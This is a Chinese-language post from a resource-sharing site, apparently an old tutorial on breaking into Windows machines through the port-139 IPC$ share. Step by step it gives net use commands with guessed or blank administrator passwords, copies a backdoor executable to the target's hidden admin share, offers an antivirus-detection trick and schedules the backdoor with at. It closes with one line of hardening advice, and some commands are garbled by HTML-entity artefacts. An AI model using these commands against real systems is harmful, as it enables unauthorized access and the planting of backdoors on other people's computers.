也想出现在这里? 联系我们

139入侵简易教程

作者 : 小编 本文共1342个字,预计阅读时间需要4分钟 发布时间: 2021-06-4 共4.96K人阅读
也想出现在这里? 联系我们

  net use\\\\192.168.0.1\\ipc$Content$nbsp;"" /user:administrator

  提到139端口,我想知道的人一定非常多,本来是不想用写这个教程的,但考虑要照顾到新人,所以还是简单的写一下。

  首先,连接的命令是:

  net<空格>use<空格>\\\\IP地址\\ipc$Content$lt;空格>密码<空格>/user:用户名

  假设我要连接的目标IP地址是:192.168.1.11,用户名是google,使用的密码是123456,那么连接对方139端口通道的格式就是这样的:

  netuse \\\\192.168.1.11\\ipc$Content$nbsp;123456 /user:google 如果连接成功,那么系统会提示"命令成功完成"!

  空密码是这样的:

  如果密码是空的,那就在原先输入密码的地方以""代替。

  开始查看权限:

  查看登录后用户权限的方法很简单,只要给目标系统传个文件就可以了,如果传诵成功,那么一般都是系统管理员权限了,如果不成功可能就是来访者权限或者其他用户组的。命令的格式是这样的:

  copy<>文件绝对路径<>\\\\IP地址\\文件目标路径

  比如我要将本地C盘下的a.exe文件拷贝到192.168.1.11的D盘下:

  copy c:\\a.exe \\\\192.168.1.11\\d$Content$nbsp;

  要注意"$"符,那是隐藏共享盘的表示符,如果对方的共享盘不是隐藏的,就不需要"$"符了。如果命令执行成功,系统同样会提示"已复制 1 个文件"

  小技巧:

  再次复制相同文件至相同路径,以检测是否存在杀毒软件!!!

  如果系统提示“改写\\\\192.168.1.11\\d$\\a.exe 吗? (Yes/No/All):”则说明文件在还在目标系统上,没有被杀毒软件查杀(一般发送过去的都是后门程序只类的东西,只有系统安装了杀毒软件都会被杀掉)。如果没有提示,则说明安装了杀毒软件。

  查看目标系统时间,准备使用at任务计划运行程序。

  命令格式:

  net<空格>time<空格>\\\\IP地址

  例子:

  net time\\\\192.168.1.11

  系统会返回目标的当前时间,时间显示后,AT任务计划命令需要使用24小时制。比如系统显示“\\\\192.168.1.11 的当前时间是 2006/5/10 下午 06:02”在使用到AT任务计划命令时,这个“下午06:02”就需要换算成“18:02”!

  使用AT命令为目标系统添加任务计划:

  格式:

  at<空格>\\\\IP地址<空格>指定运行时间<空格>需要运行的文件路径名

  例子:

  at \\\\192.168.1.1118:20 d:\\a.exe

  IPC通道入侵就目前来看已经是一个非常老的攻击手段了,现在针对IPC通道的防御手段也越来越多,越来越简单。但如果一个攻击者成功获得了IPC通道的一个System权限,那对于被攻击的系统来说无意是致命的。

  所以,建议用户将Server服务关闭,信使服务与Task Scheduler服务(计划任务)也都关闭,这样可以较全面的保护计算机在IPC通道方面的安全。

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 139入侵简易教程

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录